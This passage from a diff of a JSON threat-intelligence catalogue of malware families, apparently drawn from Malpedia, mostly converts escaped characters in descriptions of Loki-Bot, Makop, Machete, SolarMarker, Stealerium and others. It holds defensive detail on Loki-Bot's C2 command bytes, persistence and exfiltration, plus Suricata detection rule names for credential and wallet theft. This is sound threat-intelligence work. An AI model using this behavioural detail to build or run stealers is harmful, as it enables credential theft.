encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
"description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
@ -33353,7 +33353,7 @@
"value": "LONGWATCH"
},
{
"description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ",
"description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper"
@ -33520,7 +33520,7 @@
"value": "lsassDumper"
},
{
"description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detecci\u00f3n de Lu0bot, ya que no causa s\u00edntomas significativos, como una grave disminuci\u00f3n del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetr\u00eda. ",
"description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detección de Lu0bot, ya que no causa síntomas significativos, como una grave disminución del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetría. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot",
@ -33749,7 +33749,7 @@
"value": "Macaw"
},
{
"description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.",
"description": "According to ESET, Machetes dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64encoded text that corresponds to AESencrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when its given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.machete",
@ -33997,7 +33997,7 @@
"value": "MakLoader"
},
{
"description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
"description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.makop",
@ -34014,7 +34014,7 @@
"value": "Makop"
},
{
"description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
"description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware",
@ -34982,7 +34982,7 @@
"value": "Metamorfo"
},
{
"description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META \u2013 a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.",
"description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer",
@ -35602,7 +35602,7 @@
"value": "Mirai (Windows)"
},
{
"description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users\u2019 browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.",
"description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast",
@ -35674,7 +35674,7 @@
"value": "Misha"
},
{
"description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.",
"description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonalds malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu",
@ -35816,7 +35816,7 @@
"value": "MoDi RAT"
},
{
"description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS \u2013 a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them \u2013 named GetMicInfo \u2013 contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ",
"description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them named GetMicInfo contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe",
@ -36156,7 +36156,7 @@
"value": "Mosquito"
},
{
"description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim\u2019s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.",
"description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictims files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker",
@ -39017,7 +39017,7 @@
"value": "Peppy RAT"
},
{
"description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim\u2019s machine. What\u2019s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.",
"description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victims machine. Whats more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap",
@ -39381,7 +39381,7 @@
"value": "PILLOWMINT"
},
{
"description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke\u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.",
"description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDukes credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke",
@ -40287,7 +40287,7 @@
"value": "Poulight Stealer"
},
{
"description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to \u201csecurely\u201d test the ransomware protection capabilities of security vendor products.",
"description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware",
@ -40869,7 +40869,7 @@
"value": "pupy (Windows)"
},
{
"description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google\u2019s Protocol Buffer message format ",
"description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter",
@ -40931,7 +40931,7 @@
"value": "PurpleFox"
},
{
"description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user\u2019s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.",
"description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a users system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave",
@ -42230,7 +42230,7 @@
"value": "Rarog"
},
{
"description": "This ransomware encrypts all user\u2019s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.",
"description": "This ransomware encrypts all users data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar",
@ -45008,7 +45008,7 @@
"value": "Satan"
},
{
"description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer\u2019s master boot record (MBR) and prevents it from starting.",
"description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computers master boot record (MBR) and prevents it from starting.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satana",
@ -45764,7 +45764,7 @@
"value": "SharpMapExec"
},
{
"description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ",
"description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage",
@ -46991,7 +46991,7 @@
"value": "Solarbot"
},
{
"description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker\u2019s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims\u2019 web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.",
"description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarkers capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker",
@ -47421,7 +47421,7 @@
"value": "SpyEye"
},
{
"description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim\u2019s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.",
"description": "According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victims environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle",
@ -47650,7 +47650,7 @@
"value": "Stealc"
},
{
"description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor\u2019s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.",
"description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium",
@ -47678,7 +47678,7 @@
"value": "Stealer0x3401"
},
{
"description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target\u2019s backend. Hacker\u2019s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target\u2019s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.",
"description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their targets backend. Hackers commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the targets system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker",
@ -48418,7 +48418,7 @@
"value": "swen"
},
{
"description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim\u2019s Active Directory environment.",
"description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victims Active Directory environment.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer",
@ -48942,7 +48942,7 @@
"value": "TeamSpy"
},
{
"description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.",
"description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop",
@ -49740,7 +49740,7 @@
"value": "tomiris"
},
{
"description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.",
"description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files temp.txt and temp2.txt within the same directory of its execution.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf",
@ -51133,7 +51133,7 @@
"value": "Unidentified 078 (Zebrocy Nim Loader?)"
},
{
"description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target\u2019s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.",
"description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a targets data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080",
@ -52366,7 +52366,7 @@
"value": "Vulturi"
},
{
"description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.",
"description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victims filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva",
@ -52513,7 +52513,7 @@
"value": "WastedLoader"
},
{
